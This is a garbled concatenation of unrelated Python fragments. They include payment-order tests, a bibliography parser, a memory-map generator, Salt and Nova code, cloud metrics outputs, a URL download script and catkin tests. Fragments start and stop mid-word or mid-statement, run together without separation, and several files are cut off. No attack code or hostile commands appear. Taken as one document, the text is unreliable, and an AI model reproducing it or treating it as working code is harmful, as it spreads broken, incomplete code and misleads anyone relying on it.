kwargs) self.assertEquals(instance.prepare_order_response, { 'Checkout': { 'OrderToken': '0cfb4be2-47cf-4eac-865c-d66657953d5c', 'Url': ( 'http://tpppm-test.e-id.nl/Orders/OrderCheckout' '?token=0cfb4be2-47cf-4eac-865c-d66657953d5c' ) }, 'Webshop': { 'IntRef': 'a0713e4083a049a996c302f48bb3f535' } }) def test_read_order(self): """ Test read_order method. """ # Setup mock response def response(url, request): self.assertXMLEqual( request.body, self.read_file('read_order_request.xml') ) return self.read_file('read_order_response.xml') instance = G( Order, order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c' ) # Read order data with HTTMock(response): new_instance = instance.read_order() response_data = new_instance.read_order_response self.assertTrue(response_data) self.assertEquals(response_data, { 'Voorkeuren': { 'Bezorging': { 'Tijdvak': { 'Start': u'10:30', 'Eind': u'08:30' }, 'Datum': datetime.datetime(2012, 4, 26, 0, 0) } },
'Consument': { 'GeboorteDatum': datetime.datetime(1977, 6, 15, 0, 0), 'ExtRef'
: u'jjansen', 'TelefoonNummer': u'06-12345678', 'Email': u'j.jansen@e-id.nl' }, 'Facturatie': { 'Adres': { 'Huisnummer': u'1', 'Initialen': u'J', 'Geslacht': u'Meneer', 'Deurcode': None, 'Gebruik': u'P', 'Gebouw': None, 'Verdieping': None, 'Achternaam': u'Jansen', 'Afdeling': None, 'Regio': None, 'Land': u'NL', 'Wijk': None, 'Postcode': u'4131LV', 'Straat': 'Lage Biezenweg', 'Bedrijf': None, 'Plaats': u'Vianen', 'Tussenvoegsel': None, 'Voornaam': u'Jan', 'HuisnummerExt': None } }, 'Webshop': { 'IntRef': u'a0713e4083a049a996c302f48bb3f535' }, 'CommunicatieOpties': { 'ReadOrderResponseCommunicatieOptie': [ { 'Text': u'Do not deliver to neighbours', 'Code': u'REMARK' } ] }, 'Bezorging': { 'ServicePunt': { 'Huisnummer': None, 'Initialen': None, 'Geslacht': None, 'Deurcode': None, 'Gebruik': None, 'Gebouw': None, 'Verdieping': None, 'Achternaam': None, 'Afdeling': None, 'Regio': None, 'Land': None, 'Wijk': None, 'Postcode': None, 'Straat': None, 'Bedrijf': None, 'Plaats': None, 'Tussenvoegsel': None, 'Voornaam': None, 'HuisnummerExt': None }, 'Geadresseerde': { 'Huisnummer': u'1', 'Initialen': u'J', 'Geslacht': u'Meneer', 'Deurcode': None, 'Gebruik': u'Z', 'Gebouw': None, 'Verdieping': None, 'Achternaam': u'Janssen', 'Afdeling': None, 'Regio': None, 'Land': u'NL', 'Wijk': None, 'Postcode': u'4131LV', 'Straat': u'Lage Biezenweg ', 'Bedrijf': u'E-ID', 'Plaats': u'Vianen', 'Tussenvoegsel': None, 'Voornaam': u'Jan', 'HuisnummerExt': None } }, 'Opties': { 'ReadOrderResponseOpties': [ { 'Text': u'Congratulat ions with your new foobar!',
# bibliography.py r''' Defines the BibItem() and Bibliography() classes (both sub-classed from Node) The Bibliography() object is initialized directly from a .bib file using the `bibtexparser` package. We use registry.ClassFactory for unlisted fields ''' import os import logging log = logging.getLogger(__name__) import re, bibtexparser from .registry import Class
Factory from .command import Command from .content import Text class BibItem(Command): def __init__(self, citation_key=None): Comman
d.__init__(self) self.citation_key = citation_key def __repr__(self): if self.citation_key: return '{}:{}({})'.format(self.genus, self.species, self.citation_key) return '{}:{}()'.format(self.genus, self.species) def harvard_dict(self): ''' Create a dictionary of fields required for harvard-style citations. Returns a dict of citation keys mapped onto bibliographic information in the correct format. The main difficulty is with the 'author' key. ''' bibtex_tags = ('title', 'author', 'year', 'publisher', 'isbn') harv = dict() surnames = list() initials = list() for child in self.children: # deal with author field if child.species == 'author': # split on # (1) authors: delimited by a comma (,) or an 'and', then # (2) names: delimited by a point (.) or a space author_str = child.content author_list = [x.split(' ') for x in re.split(',|and', author_str)] author_list = [[x.strip() for x in au if x] for au in author_list] for author in author_list: surnames.append(author[-1]) initials.append('.'.join([x[0] for x in author[:-1]]) + '.') names = ['%s, %s' % name for name in zip(surnames, initials)] harv['author'] = ' and '.join([', '.join(names[:-1]), names[-1]]) # copy bibtex (tag, content) pairs for tags in bibtex_fields else: if child.species in bibtex_tags: harv[child.species] = child.content # set citation text e.g. (Evans 2012) if len(surnames) == 1: harv['citation'] = '(%s, %s)' % (surnames[0], harv['year']) elif len(surnames) == 2: harv['citation'] = '(%s & %s, %s)' % (surnames[0], surnames[1], harv['year']) elif len(surnames) > 3: harv['citation'] = '(%s et al. %s)' % (surnames[0], harv['year']) return harv def harvard(self): ''' print harvard-style item (should be done in a template!) ''' title = '' author = '' year = '' publisher = '' for child in self.children: if child.species == 'title': title = child.content elif child.species == 'author': author_str = child.content auth_list = [x.split('.') for x in re.split(',|and', author_str)] auth_list = [[x.strip() for x in au] for au in auth_list] auth_parts = [] for auth in auth_list: name = auth[-1] + ' ' + '.'.join([x[0] for x in auth[:-1]]) + '.' auth_parts.append(name) author = ' and '.join([', '.join(auth_parts[:-1]), auth_parts[-1]]) elif child.species == 'year': year = child.content elif child.species == 'publisher': publisher = child.content else: pass return '%s (%s) %s. %s.' % (author, year, title, publisher) class Bibliography(Command): r''' Bibliography is block command, whose `children` is a list of BibItem objects. This is an example of a Command whicl logically encloses what follows. The data is read from a .bib file then parsed into a dictionary by the `bibtexparser` package. At the moment it can only pull contents from a single bib file whereas the command allows for \bibliography{refs1.bib, refs2.bib} etc. ''' def __init__(self, bibtex_filename=None, LATEX_ROOT=None): Command.__init__(self) self.filename = bibtex_filename if bibtex_filename: if LATEX_ROOT: bibtex_filename = os.path.join(LATEX_ROOT, bibtex_filename) self.read_bibtex_file(bibtex_filename) def read_bibtex_file(self, bibtex_filename): if not bibtex_filename[-4:] == '.bib': bibtex_filename = bibtex_filename + '.bib' try: with open(bibtex_filename) as bibtex_file: chars = bibtex_file.read() except FileNotFoundError as e: raise Exception('Bibtex file \'{}\' not found'.format(e.filename)) # call bibtexparser bibtex_db = bibtexparser.loads(chars) for entry in bibtex_db.entries: bibitem = BibItem() for key, val in entry.items(): if key == 'ID': bibitem.citation_key = val else: node = ClassFactory(str(key), [], BaseClass=Text)() node.content = val bibitem.append_child(node) self.append_child(bibitem) def chars(self): ''' The raw format is the original command "\bibliography{refs.bib}" We are not testing bibtexparser! ''' return r'\bibliography{{{}}}{}'.format(self.filename, self.post_space) def add_item(self, bibitem): if not isinstance(bibitem, BibItem): Exception('Bibliography objects can only contain BibItem objects') self.children.append(bibitem) def harvard(self): ''' string harvard entries together ''' return '\n'.join([x.harvard() for x in self.children]) def test_bibtex(): bibtex_filename = './test_docs/test_article/references.bib' bib = Bibliography(bibtex_filename) print(bib.pretty_print()) print(bib.harvard()) print(bib.chars()) if __name__ == '__main__': test_bibtex()
import yaml header=""" <?x
ml version="1.0" encoding="UTF-8"?> <MemInfo Version="1" Minor="
0"> <Processor Endianness="Little" InstPath="design/cortex"> <AddressSpace Name="design_1_i_microblaze_0.design_1_i_microblaze_0_local_memory_dlmb_bram_if_cntlr" Begin="0" End="8191"> <BusBlock> """ footer=""" </BusBlock> </AddressSpace> </Processor> <Config> <Option Name="Part" Val="xc7a35tcsg324-1"/> </Config> </MemInfo> """ bitlane=""" <BitLane MemType="{type}" Placement="{placement}"> <DataWidth MSB="{msb}" LSB="{lsb}"/> <AddressRange Begin="0" End="{end_address}"/> <Parity ON="false" NumBits="0"/> </BitLane> """ remap = [3,2,1,0,7,6,5,4,11,10,9,8,15,14,13,12] bram = open("bram.yaml", "r") doc = yaml.load(bram) bit_pos = 0 bit_width = 2 output = header # for bram in doc['bram']: for i in range(len(doc['bram'])): bram = doc['bram'][remap[i]] data = dict() # print bram data['lsb'] = bit_pos data['msb'] = bit_pos + bit_width - 1 data['end_address'] = 16383 data['type'] = 'RAMB36E1' data['placement'] = bram['SITE'].split('_')[1] # remove RAMB36_ in front of the position string bit_pos += bit_width output += bitlane.format(**data) output += footer print output
import pytest import salt.states.openvswitch_port as openvswitch_port from tests.support.mock import MagicMock, patch @pytest.fixture def configure_loader_modules(): return {openvswitch_port: {"__opts__": {"test": False}}} def test_present(): """ Test to verify that the named port exists on bridge, eventually creates it. """ name = "salt" bridge = "br-salt" ret = {"name": name, "result": None, "comment": "", "changes": {}} mock = MagicMock(return_value=True) mock_l = MagicMock(return_value=["salt"]) mock_n = MagicMock(return_value=[]) with patch.dict( openvswitch_port.__salt__, { "openvswitch.bridge_exists": mock, "openvswitch.interface_get_type": MagicMock(return_value='""'), "openvswitch.port_list": mock_l, }, ): comt = "Port salt already exists." ret.update({"comment": comt, "result": True}) assert openvswitch_port.present(name, bridge) == ret with patch.dict( openvswitch_port.__salt__, { "openvswitch.bridge_exists": mock, "openvswitch.interface_get_type": MagicMock(return_value='""'), "openvswitch.port_list": mock_n, "openvswitch.port_add": mock, }, ): comt = "Port salt created on bridge br-salt." ret.update( { "comment": comt, "result": True, "changes": { "salt": { "new": "Created port salt
on bridge br-salt.", "old": "No port named salt present.", }, }, } ) assert openvswitch_port.present(name, bridge) == ret with patch.dict( openvswitch_port.__salt__, { "openvswitch.bridge_exists": mock, "
openvswitch.port_list": mock_n, "openvswitch.port_add": mock, "openvswitch.interface_get_options": mock_n, "openvswitch.interface_get_type": MagicMock(return_value=""), "openvswitch.port_create_gre": mock, "dig.check_ip": mock, }, ): comt = "Port salt created on bridge br-salt." ret.update( { "result": True, "comment": ( "Created GRE tunnel interface salt with remote ip 10.0.0.1 and key" " 1 on bridge br-salt." ), "changes": { "salt": { "new": ( "Created GRE tunnel interface salt with remote ip 10.0.0.1" " and key 1 on bridge br-salt." ), "old": ( "No GRE tunnel interface salt with remote ip 10.0.0.1 and" " key 1 on bridge br-salt present." ), }, }, } ) assert ( openvswitch_port.present( name, bridge, tunnel_type="gre", id=1, remote="10.0.0.1" ) == ret )
# Handy for debugging setup.py """Utilities creating reusable, DRY, setup.py installation scripts Typical usage in setup.py: >>> global_env, local_env = {}, {} >>> execfile(join('pug', 'setup_util.py'), global_env, local_env) >>> get_variable = local_env['get_variable'] """ import os def setup(*args, **kwargs): print('setup() args = {0}'.format(args)) print('setup() kwargs = {0}'.format(kwargs)) def get_variable(relpath, keyword='__version__'): """Read __version__ or other properties from a python file without importing it from gist.github.com/technonik/406623 but with added keyward kwarg """ for line in open(os.path.join(os.path.dirname(__file__), relpath), encoding='cp437
'):
if keyword in line: if '"' in line: return line.split('"')[1] elif "'" in line: return line.split("'")[1]
permissions = ("cloudWatch:PutMetricData",) retry = staticmethod(get_retry(('Throttling',))) BUFFER_SIZE = 20 @staticmethod def select(metrics_selector): if not metrics_selector: return NullMetricsOutput # Compatibility for boolean configuration if isinstance(metrics_selector, bool): metrics_selector = 'aws' for k in metrics_outputs.keys(): if k.startswith(metrics_selector): return metrics_outputs[k] raise ValueError("invalid metrics option %r" % metrics_selector) def __init__(self, ctx, namespace=DEFAULT_NAMESPACE): self.ctx = ctx self.namespace = namespace self.buf = [] def get_timestamp(self): """ Now, if C7N_METRICS_TZ is set to TRUE, UTC timestamp will be used. For backwards compatibility, if it is not set, UTC will be the default. To disable this and use the system's time zone, C7N_METRICS_TZ shoule be set to FALSE. """ if os.getenv("C7N_METRICS_TZ", 'TRUE').upper() in ('TRUE', ''): return datetime.datetime.utcnow() else: return datetime.datetime.now() def flush(self): if self.buf: self._put_metrics(self.namespace, self.buf) self.buf = [] def put_metric(self, key, value, unit, buffer=True, **dimensions): point = self._format_metric(key, value, unit, dimensions) self.buf.append(point) if buffer: # Max metrics in a single request if len(self.buf) == 20: self.flush() else: self.flush() def _format_metric(self, key, value, unit, dimensions): d = { "MetricName": key, "Timestamp": self.get_timestamp(), "Value": value, "Unit": unit} d["Dimensions"] = [ {"Name": "Policy", "Value": self.ctx.policy.name}, {"Name": "ResType", "Value": self.ctx.policy.resource_type}] for k, v in dimensions.items(): d['Dimensions'].append({"Name": k, "Value": v}) return d def _put_metrics(self, ns, metrics): watch = local_session(self.ctx.session_factory).client('cloudwatch') for metric_values in chunks(metrics, self.BUFFER_SIZE): return self.retry( watch.put_metric_data, Namespace=ns, MetricData=metrics) class NullMetricsOutput(MetricsOutput): permissions = () def __init__(self, ctx, namespace=DEFAULT_NAMESPACE): super(NullMetricsOutput, self).__init__(ctx, namespace) self.data = [] def _put_metrics(self, ns, metrics): self.data.append({'Namespace': ns, 'MetricData': metrics}) for m in metrics: if m['MetricName'] not in ('ActionTime', 'ResourceTime'): log.debug(self.format_metric(m)) def format_metric(self, m): label = "metric:%s %s:%s" % (m['MetricName'], m['Unit'], m['Value']) for d in m['Dimensions']: label += " %s:%s" % (d['Name'].lower(), d['Value'].lower()) return label class LogOutput(object): log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' def __init__(self, ctx): self.ctx = ctx def get_handler(self): raise NotImplementedError() def __enter__(self): log.debug("Storing output with %s" % repr(self)) self.join_log() return self def __exit__(self, exc_type=None, exc_value=None, exc_traceback=None): self.leave_log() if exc_type is not None: log.exception("Error while executing policy") def join_log(self): self.handler = self.get_handler() self.handler.setLevel(logging.DEBUG) self.handler.setFormatter(logging.Formatter(self.log_format)) mlog = logging.getLogger('custodian') mlog.addHandler(self.handler) def leave_log(self): mlog = logging.getLogger('custodian') mlog.removeHandler(self.handler) self.handler.flush() self.handler.close() class CloudWatchLogOutput(LogOutput): log_format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s' def get_handler(self): return CloudWatchLogHandler( log_group=self.ctx.options.log_group, log_stream=self.ctx.policy.name, session_factory=lambda x=None: self.ctx.session_factory( assume=False)) def __repr__(self): return "<%s to group:%s stream:%s>" % ( self.__class__.__name__, self.ctx.options.log_group, self.ctx.policy.name) class FSOutput(LogOutput): @staticmethod def select(path): for k in blob_outputs.keys(): if path.startswith('%s://' % k): return blob_outputs[k] # Fall back local disk return blob_outputs['file'] @staticmethod def join(*parts): return os.path.join(*parts) def __init__(self, ctx): super(FSOutput, self).__init__(ctx) self.root_dir = self.ctx.output_path or tempfile.mkdtemp() def get_handler(self): return logging.FileHandler( os.path.join(self.root_dir, 'custodian-run.log')) def compress(self): # Compress files individually so thats easy to walk them, without # downloading tar and extracting. for root, dirs, files in os.walk(self.root_dir): for f in files: fp = os.path.join(root, f) with gzip.open(fp + ".gz", "wb", compresslevel=7) as zfh: with open(fp, "rb") as sfh: shutil.copyfileobj(sfh, zfh, length=2**15) os.remove(fp) @blob_outputs.register('file') class DirectoryOutput(FSOutput): permissions = () def __init__(self, ctx): super(DirectoryOutput, self).__init__(ctx) if self.root_dir.startswith('file://'): self.root_dir = self.root_dir[len('file://'):] if self.ctx.output_path is not None: if not os.path.exists(self.root_dir): os.makedirs(self.root_dir) def __repr__(self): return "<%s to dir:%s>" % (self.__class__.__name__, self.root_dir) @blob_outputs.register('s3') class S3Output(FSOutput): """ Usage: .. code-block:: python with S3Output(session_factory, 's3://bucket/prefix'): log.info('xyz') # -> log messages sent to custodian-run.log.gz """ permissions = ('S3:PutObject',) def __init__(self, ctx): super(S3Output, self).__init__(ctx) self.date_path = datetime.datetime.now().strftime('%Y/%m/%d/%H') self.s3_path, self.bucket, self.key_prefix = parse_s3( self.ctx.output_path) self.root_dir = tempfile.mkdtemp() self.transfer = None def __repr__(self): return "<%s to bucket:%s prefix:%s>" % ( self.__class__.__name__, self.bucket, "%s/%s" % (self.key_prefix, self.date_path)) @staticmethod def join(*parts): return "/".join([s.strip('/') for s in parts]) def __exit__(self, exc_type=None, exc_value=None, exc_traceback=None): from boto3.s3.transfer import S3Transfer, TransferConfig if exc_type is not None: log.exception("Error while executing policy") log.debug("Uploading policy logs") self.leave_log() self.compress() self.transfer = S3Transfer( self.ctx.session_factory(assume=False).client('s3'), config=TransferConfig(use_threads=False)) self.upload() shutil.rmtree(self.root_dir) log.debug("Policy Logs uploaded") def upload(self): for root, dirs, files in os.walk(self.root_dir):
for f in files: key = "%s/%s%s" % ( self.key_prefix, self.date_path, "%s/%s" % ( root[len(self.root_dir):], f)) key = key.strip('/') self.transfer.
upload_file( os.path.join(root, f), sel
#!/usr
/bin/env python import sys urllib_urlretrieve = None try: # Python 3.x or later import urllib.request urllib_urlretrieve = urllib.request.urlretrieve except ImportError: # Python 2.x import urllib urllib_urlretrieve = urllib.urlretrieve def download(url, target_path): urllib_urlretrieve(url, target_path) if __name__ == '__main__': if len(sys.argv) != 3: print 'Usage: python %s url target_path' % sys.argv[0] sys.exit() url = sys.argv[1] target_
path = sys.argv[2] download(url, target_path)
from selenium import webdriver from fixture.session import SessionHelper from fixture.group import GroupHelper from fixture.contact import Cont
actHelper class Application: def __init__(self, browser, base_url): if browser == "firefox": self.wd = webdriver.Firefox(capabilities={"marionette": False}, firefox_binary="C:/Program Files/Mozilla Firefox/firefox.exe") elif browser == "chrome": self.wd = webdriver.Chrome() elif browser == "ie": self.wd = webdriver.Ie() else:
raise ValueError("Unrecognized browser %s" % browser) self.session = SessionHelper(self) self.group = GroupHelper(self) self.contact = ContactHelper(self) self.base_url = base_url def is_valid(self): try: self.wd.current_url return True except: return False def open_homepage(self): wd = self.wd if not wd.current_url.endswith("addressbook/"): wd.get(self.base_url) def destroy(self): self.wd.quit()
nova.policies import keypairs as kp_policies class KeypairController(wsgi.Controller): """Keypair API controller for the OpenStack API.""" _view_builder_class = keypairs_view.ViewBuilder def __init__(self): super(KeypairController, self).__init__() self.api = compute_api.KeypairAPI() @wsgi.Controller.api_version("2.10") @wsgi.response(201) @wsgi.expected_errors((400, 403, 409)) @validation.schema(keypairs.create_v210) def create(self, req, body): """Create or import keypair. A policy check restricts users from creating keys for other users params: keypair object with: name (required) - string public_key (optional) - string type (optional) - string user_id (optional) - string """ # handle optional user-id for admin only user_id = body['keypair'].get('user_id') return self._create(req, body, key_type=True, user_id=user_id) @wsgi.Controller.api_version("2.2", "2.9") # noqa @wsgi.response(201) @wsgi.expected_errors((400, 403, 409)) @validation.schema(keypairs.create_v22) def create(self, req, body): # noqa """Create or import keypair. Sending name will generate a key and return private_key and fingerprint. Keypair will have the type ssh or x509, specified by type. You can send a public_key to add an existing ssh/x509 key. params: keypair object with: name (required) - string public_key (optional) - string type (optional) - string """ return self._create(req, body, key_type=True) @wsgi.Controller.api_version("2.1", "2.1") # noqa @wsgi.expected_errors((400, 403, 409)) @validation.schema(keypairs.create_v20, "2.0", "2.0") @validation.schema(keypairs.create, "2.1", "2.1") def create(self, req, body): # noqa """Create or import keypair. Sending name will generate a key and return private_key and fingerprint. You can send a public_key to add an existing ssh key. params: keypair object with: name (required) - string public_key (optional) - string """ return self._create(req, body) def _create(self, req, body, user_id=None, key_type=False): context = req.environ['nova.context'] params = body['keypair'] name = common.normalize_name(params['name']) key_type_value = params.get('type', keypair_obj.KEYPAIR_TYPE_SSH) user_id = user_id or context.user_id context.can(kp_policies.POLICY_ROOT % 'create', target={'user_id': user_id}) return_priv_key = False try: if 'public_key' in params: keypair = self.api.import_key_pair( context, user_id, name, params['public_key'], key_type_value) else: keypair, private_key = self.api.create_key_pair( context, user_id, name, key_type_value) keypair['private_key'] = private_key return_priv_key = True except exception.KeypairLimitExceeded as e: raise webob.exc.HTTPForbidden(explanation=str(e)) except exception.InvalidKeypair as exc: raise webob.exc.HTTPBadRequest(explanation=exc.format_message()) except exception.KeyPairExists as exc: raise webob.exc.HTTPConflict(explanation=exc.format_message()) return self._view_builder.create(keypair, private_key=return_priv_key, key_type=key_type) @wsgi.Controller.api_version("2.1", "2.1") @validation.query_schema(keypairs.delete_query_schema_v20) @wsgi.response(202) @wsgi.expected_errors(404) def delete(self, req, id): self._delete(req, id) @wsgi.Controller.api_version("2.2", "2.9") # noqa @validation.query_schema(keypairs.delete_query_schema_v20) @wsgi.response(204) @wsgi.expected_errors(404) def delete(self, req, id): # noqa self._delete(req, id) @wsgi.Controller.api_version("2.10") # noqa @validation.query_schema(keypairs.delete_query_schema_v275, '2.75') @validation.query_schema(keypairs.delete_query_schema_v210, '2.10', '2.74') @wsgi.response(204) @wsgi.expected_errors(404) def delete(self, req, id): # noqa # handle optional user-id for admin only user_id = self._get_user_id(req) self._delete(req, id, user_id=user_id) def _delete(self, req, id, user_id=None): """Delete a keypair with a given name.""" context = req.environ['nova.context'] # handle optional user-id for admin only user_id = user_id or context.user_id context.can(kp_policies.POLICY_ROOT % 'delete', target={'user_id': user_id}) try: self.api.delete_key_pair(context, user_id, id) except exception.KeypairNotFound as exc: raise webob.exc.HTTPNotFound(explanation=exc.format_message()) def _get_user_id(self, req): if 'user_id' in req.GET.keys(): user_id = req.GET.getall('user_id')[0] return user_id @wsgi.Controller.api_version("2.10") @validation.query_schema(keypairs.show_query_schema_v275, '2.75') @validation.query_schema(keypairs.show_query_schema_v210, '2.10', '2.74') @wsgi.expected_errors(404) def show(self, req, id): # handle optional user-id for admin only user_id = self._get_user_id(req) return self._show(req, id, key_type=True, user_id=user_id) @wsgi.Controller.api_version("2.2", "2.9") # noqa @validation.query_schema(keypairs.show_query_schema_v20) @wsgi.expected_errors(404) def show(self, req, id): # noqa return self._show(req, id, key_type=True) @wsgi.Controller.api_version("2.1", "2.1") # noqa @validation.query_schema(keypairs.show_query_schema_v20) @wsgi.expected_errors(404) def show(self, req, id): # noqa return self._show(req, id) def _show(self, req, id, key_type=False, user_id=None): """Return data for the given key name.""" context = req.environ['nova.context'] user_id = user_id or context.user_id context.can(kp_policies.POLICY_ROOT % 'show', target={'user_id': user_id}) try: keypair = self.api.get_key_pair(context, user_id, id) except exception.KeypairNotFound as exc: raise webob.exc.HTTPNotFound(explanation=exc.format_message()) return self._view_builder.show(keypair, key_type=key_type) @wsgi.Controller.api_version("2.35") @validation.query_schema(keypairs.index_q
uery_schema_v275, '2.75') @validation.query_schema(keypairs.index_query_schema_v235, '2.35', '2.74') @wsgi.expected_errors(400) def index(self, req):
user_id = self._get_user_id(req) return self._index(req, key_type=True, user_id=user_id, links=True) @wsgi.Controller.api_version("2.10", "2.34") # noqa @validation.query_schema(keypairs.index_query_schema_v210) @wsgi.expected_errors(()) def index(self, req): # noqa # handle optional user-id for admin only user_id = self._get_user_id(req) return self._index(req, key_type=True, user_id=user_id) @wsgi.Controller.api_version("2.2", "2.9") # noqa @validation.query_schema(keypairs.index_query_schema_v20) @wsgi.expected_errors(()) def index(self, req): # noqa return self._index(req, key_type=True) @wsgi.Controller.api_version("2.1", "2.1") # noqa @validation.query_schema(keypairs.index_query_schema_v20) @wsgi.expected_errors(()) def index(self, req): # noqa return self._index(req) def _index(self, req, key_type=False, user_id=None, links=False): """List of keypairs for a user.""" context = req.environ['nova.context'] user_id = user_id or context.user_id context.can(kp_policies.POLICY_ROOT % 'index',
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2020 dl1ksv. # # SPDX-License-Identifier: GPL-3.0-or-later # from gnuradio import gr, gr_unittest from PyQt5 import Qt import sip # from gnuradio import blocks try: from display import text_msg except ImportError
: import os import sys dirname, filename = os.path.split(os.path.abspath(__file__)) sys.path.append(os.path.join(dirname, "bindings")) from display import display_text_msg class qa_display_text_msg(gr_unittest.TestCase): def setUp(self): self.tb = gr.top_block() def tearDown(self): self.tb = None def test_instance(self): instance = text_msg('TestString','test',80,None) b = sip.wrapinstance(instance.pyqwidget(),Qt.
QWidget) def test_001_descriptive_test_name(self): # set up fg self.tb.run() # check data if __name__ == '__main__': gr_unittest.run(qa_display_text_msg)
akelists(mock_pack, 'groovy') self.assertTrue('project(foo)' in result, result) self.assertTrue('find_package(catkin REQUIRED)' in result, result) mock_pack.catkin_deps = ['bar', 'baz'] result = create_cmakelists(mock_pack, 'groovy') self.assertTrue('project(foo)' in result, result) expected = """find_package(catkin REQUIRED COMPONENTS bar baz )""" self.assertTrue(expected in result, result) def test_create_package_xml(self): maint = self.get_maintainer() pack = PackageTemplate(name='foo', description='foo', version='0.0.0', maintainers=[maint], licenses=['BSD']) result = create_package_xml(pack, 'groovy') self.assertTrue('<name>foo</name>' in result, result) def test_create_targetlib_args(self): mock_pack = MagicMock() mock_pack.name = 'foo' mock_pack.catkin_deps = [] mock_pack.boost_comps = [] mock_pack.system_deps = [] statement = _create_targetlib_args(mock_pack) self.assertEqual('# ${catkin_LIBRARIES}\n', statement) mock_pack.catkin_deps = ['roscpp', 'rospy'] mock_pack.boost_comps = [] mock_pack.system_deps = [] statement = _create_targetlib_args(mock_pack) self.assertEqual('# ${catkin_LIBRARIES}\n', statement) mock_pack.catkin_deps = ['roscpp'] mock_pack.boost_comps = ['thread', 'filesystem'] mock_pack.system_deps = [] statement = _create_targetlib_args(mock_pack) self.assertEqual('# ${catkin_LIBRARIES}\n# ${Boost_LIBRARIES}\n', statement) mock_pack.catkin_deps = ['roscpp'] mock_pack.boost_comps = [] mock_pack.system_deps = ['log4cxx', 'BZip2'] statement = _create_targetlib_args(mock_pack) self.assertEqual('# ${catkin_LIBRARIES}\n# ${log4cxx_LIBRARIES}\n# ${BZip2_LIBRARIES}\n', statement) mock_pack.catkin_deps = ['roscpp'] mock_pack.boost_comps = ['thread', 'filesystem'] mock_pack.system_deps = ['log4cxx', 'BZip2'] statement = _create_targetlib_args(mock_pack) self.assertEqual('# ${catkin_LIBRARIES}\n# ${Boost_LIBRARIES}\n# ${log4cxx_LIBRARIES}\n# ${BZip2_LIBRARIES}\n', statement) def test_create_include_macro(self): mock_pack = MagicMock() mock_pack.name = 'foo' mock_pack.catkin_deps = [] mock_pack.boost_comps = [] mock_pack.system_deps = [] statement = _create_include_macro(mock_pack) self.assertEqual('# include_directories(include)', statement) mock_pack.catkin_deps = ['roscpp', 'rospy'] mock_pack.boost_comps = [] mock_pack.system_deps = [] statement = _create_include_macro(mock_pack) self.assertEqual('# include_directories(include)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n)', statement) mock_pack.catkin_deps = ['roscpp'] mock_pack.boost_comps = ['thread', 'filesystem'] mock_pack.system_deps = [] statement = _create_include_macro(mock_pack) self.assertEqual('# include_directories(include)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n ${Boost_INCLUDE_DIRS}\n)', statement) mock_pack.catkin_deps = ['roscpp'] mock_pack.boost_comps = [] mock_pack.system_deps = ['log4cxx', 'BZip2'] statement = _create_include_macro(mock_pack) self.assertEqual('# include_directories(include)\n# TODO: Check names of system library include directories (log4cxx, BZip2)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n ${log4cxx_INCLUDE_DIRS}\n ${BZip2_INCLUDE_DIRS}\n)', statement) mock_pack.catkin_deps = ['roscpp'] mock_pack.boost_comps = ['thread', 'filesystem'] mock_pack.system_deps = ['log4cxx', 'BZip2'] statement = _create_include_macro(mock_pack) self.assertEqual('# include_directories(include)\n# TODO: Check names of system library include directories (log4cxx, BZip2)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n ${Boost_INCLUDE_DIRS}\n ${log4cxx_INCLUDE_DIRS}\n ${BZip2_INCLUDE_DIRS}\n)', statement) def test_create_package(self): maint = self.get_maintainer() pack = PackageTemplate(name='bar', description='bar', package_format='1', version='0.0.0', version_abi='pabi', maintainers=[maint], licenses=['BSD']) try: rootdir = tempfile.mkdtemp() file1 = os.path.join(rootdir, 'CMakeLists.txt') file2 = os.path.join(rootdir, PACKAGE_MANIFEST_FILENAME) create_package_files(rootdir, pack, 'groovy', {file1: ''}) self.assertTrue(os.path.isfile(file1)) self.assertTrue(os.path.isfile(file2)) finally: shutil.rmtree(rootdir) def test_create_package_template(self): template = PackageTemplate._create_package_template( package_name='bar2', catkin_deps=['dep1', 'dep2']) self.assertEqual('dep1', template.build_depends[0].name) self.assertEqual('dep2', template.build_depends[1].name) def test_parse_generated(self): maint = self.get_maintainer() pack = PackageTemplate(name='bar', package_format=1, version='0.0.0', version_abi='pabi', urls=[Url('foo')], description='pdesc', maintainers=[maint], licenses=['BSD']) try: rootdir = tempfile.mkdtemp() file1 =
os.path.join(rootdir, 'CMakeLists.txt') file2 = os.path.join(rootdir, PACKAGE_MANIFEST_FILENAME) create_package_files(rootdir, pack, 'groo
vy') self.assertTrue(os.path.isfile(file1)) self.assertTrue(os.path.isfile(file2)) pack_result = parse_package(file2) self.assertEqual(pack.name, pack_result.name) self.assertEqual(pack.package_format, pack_result.package_format) self.assertEqual(pack.version, pack_result.version) self.assertEqual(pack.version_abi, pack_result.version_abi) self.assertEqual(pack.description, pack_result.description) self.assertEqual(pack.maintainers[0].name, pack_result.maintainers[0].name) self.assertEqual(pack.maintainers[0].email, pack_result.maintainers[0].email) self.assertEqual(pack.authors, pack_result.authors) self.assertEqual(pack.urls[0].url, pack_result.urls[0].url) self.assertEqual('website', pack_result.urls[0].type) self.assertEqual(pack.licenses, pack_result.licenses) self.assertEqual(pack.build_depends, pack_result.build_depends) self.assertEqual(pack.buildtool_depends, pack_result.buildtool_depends) self.assertEqual(pack.run_depends, pack_result.run_depends) self.assertEqual(pack.test_depends, pack_result.test_depends) self.assertEqual(pack.conflicts, pack_result.conflicts) self.assertEqual(pack.replaces, pack_result.replaces) self.assertEqual(pack.exports, pack_result.exports) rdict = generate_distutils_setup(package_xml_path=file2) self.assertEqual({'name': 'bar', 'maintainer': u('John Foo'), 'maintainer_email': 'foo@bar.com', 'description': 'pdesc', 'license': 'BSD', 'version': '0.0.0', 'author': '', 'url': 'foo'}, rdict) finally: shutil.rmtree(rootdir) def test_parse_generated_multi(self): # test with multiple attributes fill
#!/usr/bin/env python # encoding: utf-8 import glob import os import subprocess ''' Convert 23andMe files to PLINK format ''' def twenty3_and_me_files(): """Return the opensnp files that are 23 and me format""" all_twenty3_and_me_files= glob.glo
